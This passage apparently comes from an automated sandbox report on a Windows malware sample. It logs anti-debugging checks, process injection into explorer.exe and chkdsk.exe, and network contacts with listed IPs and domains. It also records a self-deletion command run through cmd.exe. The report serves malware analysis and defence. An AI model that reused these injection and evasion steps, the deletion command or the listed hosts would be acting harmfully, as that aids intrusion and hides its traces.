          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169F0BF mov eax, dword ptr fs:[00000030h]2_2_0169F0BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669080 mov eax, dword ptr fs:[00000030h]2_2_01669080
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3884 mov eax, dword ptr fs:[00000030h]2_2_016E3884
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3884 mov eax, dword ptr fs:[00000030h]2_2_016E3884
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166DB60 mov ecx, dword ptr fs:[00000030h]2_2_0166DB60
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01693B7A mov eax, dword ptr fs:[00000030h]2_2_01693B7A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01693B7A mov eax, dword ptr fs:[00000030h]2_2_01693B7A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166DB40 mov eax, dword ptr fs:[00000030h]2_2_0166DB40
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738B58 mov eax, dword ptr fs:[00000030h]2_2_01738B58
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166F358 mov eax, dword ptr fs:[00000030h]2_2_0166F358
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172131B mov eax, dword ptr fs:[00000030h]2_2_0172131B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168DBE9 mov eax, dword ptr fs:[00000030h]2_2_0168DBE9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]2_2_016903E2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov ecx, dword ptr fs:[00000030h]2_2_017123E3
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov ecx, dword ptr fs:[00000030h]2_2_017123E3
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3 mov eax, dword ptr fs:[00000030h]2_2_017123E3
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E53CA mov eax, dword ptr fs:[00000030h]2_2_016E53CA
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E53CA mov eax, dword ptr fs:[00000030h]2_2_016E53CA
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]2_2_01694BAD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]2_2_01694BAD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]2_2_01694BAD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01735BA5 mov eax, dword ptr fs:[00000030h]2_2_01735BA5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]2_2_0169138B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]2_2_0169138B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]2_2_0169138B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01671B8F mov eax, dword ptr fs:[00000030h]2_2_01671B8F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01671B8F mov eax, dword ptr fs:[00000030h]2_2_01671B8F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171D380 mov ecx, dword ptr fs:[00000030h]2_2_0171D380
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172138A mov eax, dword ptr fs:[00000030h]2_2_0172138A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169B390 mov eax, dword ptr fs:[00000030h]2_2_0169B390
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692397 mov eax, dword ptr fs:[00000030h]2_2_01692397
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A927A mov eax, dword ptr fs:[00000030h]2_2_016A927A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171B260 mov eax, dword ptr fs:[00000030h]2_2_0171B260
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171B260 mov eax, dword ptr fs:[00000030h]2_2_0171B260
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738A62 mov eax, dword ptr fs:[00000030h]2_2_01738A62
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]2_2_01669240
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]2_2_01669240
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]2_2_01669240
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]2_2_01669240
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172EA55 mov eax, dword ptr fs:[00000030h]2_2_0172EA55
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016F4257 mov eax, dword ptr fs:[00000030h]2_2_016F4257
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A4A2C mov eax, dword ptr fs:[00000030h]2_2_016A4A2C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A4A2C mov eax, dword ptr fs:[00000030h]2_2_016A4A2C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AA16 mov eax, dword ptr fs:[00000030h]2_2_0172AA16
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AA16 mov eax, dword ptr fs:[00000030h]2_2_0172AA16
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01678A0A mov eax, dword ptr fs:[00000030h]2_2_01678A0A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AA16 mov eax, dword ptr fs:[00000030h]2_2_0166AA16
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AA16 mov eax, dword ptr fs:[00000030h]2_2_0166AA16
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01683A1C mov eax, dword ptr fs:[00000030h]2_2_01683A1C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]2_2_01665210
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov ecx, dword ptr fs:[00000030h]2_2_01665210
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]2_2_01665210
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]2_2_01665210
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692AE4 mov eax, dword ptr fs:[00000030h]2_2_01692AE4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692ACB mov eax, dword ptr fs:[00000030h]2_2_01692ACB
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167AAB0 mov eax, dword ptr fs:[00000030h]2_2_0167AAB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167AAB0 mov eax, dword ptr fs:[00000030h]2_2_0167AAB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169FAB0 mov eax, dword ptr fs:[00000030h]2_2_0169FAB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169D294 mov eax, dword ptr fs:[00000030h]2_2_0169D294
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169D294 mov eax, dword ptr fs:[00000030h]2_2_0169D294
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C577 mov eax, dword ptr fs:[00000030h]2_2_0168C577
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C577 mov eax, dword ptr fs:[00000030h]2_2_0168C577
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A3D43 mov eax, dword ptr fs:[00000030h]2_2_016A3D43
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3540 mov eax, dword ptr fs:[00000030h]2_2_016E3540
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01713D40 mov eax, dword ptr fs:[00000030h]2_2_01713D40
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01687D50 mov eax, dword ptr fs:[00000030h]2_2_01687D50
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738D34 mov eax, dword ptr fs:[00000030h]2_2_01738D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172E539 mov eax, dword ptr fs:[00000030h]2_2_0172E539
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]2_2_01694D3B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]2_2_01694D3B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]2_2_01694D3B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AD30 mov eax, dword ptr fs:[00000030h]2_2_0166AD30
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016EA537 mov eax, dword ptr fs:[00000030h]2_2_016EA537
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01718DF1 mov eax, dword ptr fs:[00000030h]2_2_01718DF1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167D5E0 mov eax, dword ptr fs:[00000030h]2_2_0167D5E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167D5E0 mov eax, dword ptr fs:[00000030h]2_2_0167D5E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]2_2_0172FDE2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]2_2_0172FDE2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]2_2_0172FDE2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]2_2_0172FDE2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov ecx, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016935A1 mov eax, dword ptr fs:[00000030h]2_2_016935A1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]2_2_01691DB5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]2_2_01691DB5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]2_2_01691DB5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017305AC mov eax, dword ptr fs:[00000030h]2_2_017305AC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017305AC mov eax, dword ptr fs:[00000030h]2_2_017305AC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0040ACF0 LdrLoadDll
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 1_2_003B439B SetUnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 1_2_003B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_003B439B SetUnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_003B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.10 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.85.152.171 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.informacion-numero-24-h.site
          Source: C:\Windows\explorer.exeDomain query: www.tzjisheng.com
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1040000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxskJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.255915814.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.278458875.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.295991072.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.265115735.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.301324707.0000000005920000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
